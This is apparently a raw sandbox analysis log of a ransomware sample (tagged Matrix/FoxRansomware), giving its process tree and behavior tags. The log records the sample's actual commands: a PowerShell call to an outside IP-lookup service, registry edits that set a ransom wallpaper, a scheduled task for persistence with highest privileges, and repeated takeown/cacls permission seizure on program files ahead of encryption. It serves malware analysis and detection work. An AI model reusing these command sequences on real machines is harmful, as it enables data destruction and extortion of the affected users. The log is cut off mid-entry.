PID 1580 wrote to memory of 1836	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1580 wrote to memory of 1836	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1452 wrote to memory of 1588	1452	cmd.exe	reg.exe
PID 1452 wrote to memory of 1588	1452	cmd.exe	reg.exe
PID 1452 wrote to memory of 1588	1452	cmd.exe	reg.exe
PID 1452 wrote to memory of 1588	1452	cmd.exe	reg.exe
PID 1452 wrote to memory of 1976	1452	cmd.exe	reg.exe
PID 1452 wrote to memory of 1976	1452	cmd.exe	reg.exe
PID 1452 wrote to memory of 1976	1452	cmd.exe	reg.exe
PID 1452 wrote to memory of 1976	1452	cmd.exe	reg.exe
PID 1836 wrote to memory of 1368	1836	cmd.exe	cacls.exe
PID 1836 wrote to memory of 1368	1836	cmd.exe	cacls.exe
PID 1836 wrote to memory of 1368	1836	cmd.exe	cacls.exe
PID 1836 wrote to memory of 1368	1836	cmd.exe	cacls.exe
PID 1836 wrote to memory of 1704	1836	cmd.exe	takeown.exe
PID 1836 wrote to memory of 1704	1836	cmd.exe	takeown.exe
PID 1836 wrote to memory of 1704	1836	cmd.exe	takeown.exe
PID 1836 wrote to memory of 1704	1836	cmd.exe	takeown.exe
PID 1836 wrote to memory of 1996	1836	cmd.exe	cmd.exe
PID 1836 wrote to memory of 1996	1836	cmd.exe	cmd.exe
PID 1836 wrote to memory of 1996	1836	cmd.exe	cmd.exe
PID 1836 wrote to memory of 1996	1836	cmd.exe	cmd.exe
PID 1996 wrote to memory of 1424	1996	cmd.exe	8Pk9qSFt.exe
PID 1996 wrote to memory of 1424	1996	cmd.exe	8Pk9qSFt.exe
PID 1996 wrote to memory of 1424	1996	cmd.exe	8Pk9qSFt.exe
PID 1996 wrote to memory of 1424	1996	cmd.exe	8Pk9qSFt.exe
PID 1424 wrote to memory of 1524	1424	8Pk9qSFt.exe	8Pk9qSFt64.exe
PID 1424 wrote to memory of 1524	1424	8Pk9qSFt.exe	8Pk9qSFt64.exe
PID 1424 wrote to memory of 1524	1424	8Pk9qSFt.exe	8Pk9qSFt64.exe
PID 1424 wrote to memory of 1524	1424	8Pk9qSFt.exe	8Pk9qSFt64.exe

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"
1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1580
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWbpVd9W.exe"
  2⤵
  PID:1920
- C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWbpVd9W.exe
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWbpVd9W.exe" -n
  2⤵
  - Executes dropped EXE
  PID:760
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y81a2v1H.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1632
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\H5mnJKOJ.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1452
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\H5mnJKOJ.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:292
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:1976
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\jpMqGlzX.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1072
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\jpMqGlzX.vbs"
    3⤵
    PID:1880
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\iZwk4ceY.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      PID:1748
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\iZwk4ceY.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:520
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:1708
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:1384
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
    3⤵
    PID:1368
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    - Modifies file permissions
    PID:1704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "ENUtxt.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1996
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "ENUtxt.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1424
    - - C:\Users\Admin\AppData\Local\Temp\8Pk9qSFt64.exe
        
        8Pk9qSFt.exe -accepteula "ENUtxt.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:1524
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Loads dropped DLL
  PID:1392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    - Modifies file permissions
    PID:1756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1304
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "StandardBusiness.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1608
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:268
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
  2⤵
  - Loads dropped DLL
  PID:536
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    3⤵
    PID:924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    - Modifies file permissions
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "DefaultID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:804
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "DefaultID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1632
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1548
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
  2⤵
  - Loads dropped DLL
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
    3⤵
    PID:1416
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
    3⤵
    - Modifies file permissions
    PID:1776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "AdobeID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1368
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "AdobeID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1324
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1624
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
  2⤵
  - Loads dropped DLL
  PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
    3⤵
    PID:1000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
    3⤵
    - Modifies file permissions
    PID:1268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1392
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1940
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1020
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
  2⤵
  - Loads dropped DLL
  PID:860
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"
    3⤵
    - Modifies file permissions
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "Dynamic.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:292
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "Dynamic.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:796
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:536
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
  2⤵
  - Loads dropped DLL
  PID:1536
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
    3⤵
    PID:1160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
    3⤵
    - Modifies file permissions
    PID:1604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "SignHere.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:560
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "SignHere.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1528
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:1652
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:1800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1816
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:276
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:1544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1512
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:1712
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1368
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C
    3⤵
    PID:760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "HeartsMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1976
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "HeartsMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1616
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1676
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "MahjongMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1960
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "MahjongMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:520
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1304
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "ChessMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:804
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "ChessMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1404
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:860
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "PurblePlaceMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2028
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "PurblePlaceMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:536
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:552
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""
  2⤵
  - Loads dropped DLL
  PID:108
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"
    3⤵
    - Modifies file permissions
    PID:1704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "RTC.der" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1944
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "RTC.der" -nobanner
      4⤵
      Executes dropped EXE
      PID:1728
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""
  2⤵
  - Loads dropped DLL
  PID:520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C
    3⤵
    PID:1304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"
    3⤵
    - Modifies file permissions
    PID:1816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "end_review.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1876
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "end_review.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:740
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""
  2⤵
  - Loads dropped DLL
  PID:1868
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C
    3⤵
    PID:952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"
    3⤵
    - Modifies file permissions
    PID:948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "reviews_joined.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1384
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "reviews_joined.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1256
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1544
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""
  2⤵
  - Loads dropped DLL
  PID:1828
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"
    3⤵
    - Modifies file permissions
    PID:1276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "server_ok.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1740
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "server_ok.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1736
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""
  2⤵
  - Loads dropped DLL
  PID:828
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C
    3⤵
    PID:800
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"
    3⤵
    - Modifies file permissions
    PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "warning.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:560
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "warning.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1268
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
